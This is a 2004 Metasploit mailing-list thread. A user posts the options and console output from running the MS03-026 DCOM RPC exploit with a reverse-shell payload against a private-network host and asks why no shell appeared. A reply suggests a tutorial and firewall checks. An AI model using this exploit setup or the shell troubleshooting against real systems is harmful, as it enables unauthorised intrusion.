Metasploit mailing list archives

usefulness of this tool


From: jasanchezo at e-nfinito.com (Jose Alejandro Sanchez Ortega)
Date: Fri, 17 Sep 2004 17:18:23 -0500

And ... my contrib for this issue:

Exploit and Payload Options
===========================

   Exploit:    Name      Default         Description
   --------    ------    ------------    ------------------
   required    RPORT     135             The target port
   required    RHOST     172.16.25.18    The target address

   Payload:    Name        Default         Description
   --------    --------    ------------    
------------------------------------------
   required    LPORT       4321            Local port to receive 
connection
   required    LHOST       172.16.25.27    Local address to receive 
connection
   optional    EXITFUNC    seh             Exit technique: "process", 
"thread", "seh"

   Target: Windows NT SP6/2K/XP ALL

msf msrpc_dcom_ms03_026(win32_reverse) > check
[*] No check has been implemented for this module
msf msrpc_dcom_ms03_026(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Connected to REMACT with group ID 0x10823b
[*] Exiting Reverse Handler.

msf msrpc_dcom_ms03_026(win32_reverse) >


Where is the shell?? ...

I am sure the service is running and not blocking the ports!


Hi, (and welcome)

take a look on this MSF Video Tutorial:

http://wired.s6n.com/files/jathias/framework2.2-tut.rar
Windows Player:
http://wired.s6n.com/files/jathias/CamPlay.zip

If you use a bind_shell payload, make sure that you don't block the 
return port or adress (any FW in the pc you use for the attack?)

Regards,
Jerome ATHIAS
------------------------

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/enriched
Size: 1560 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20040917/1a0cde64/attachment.bin>


Current thread: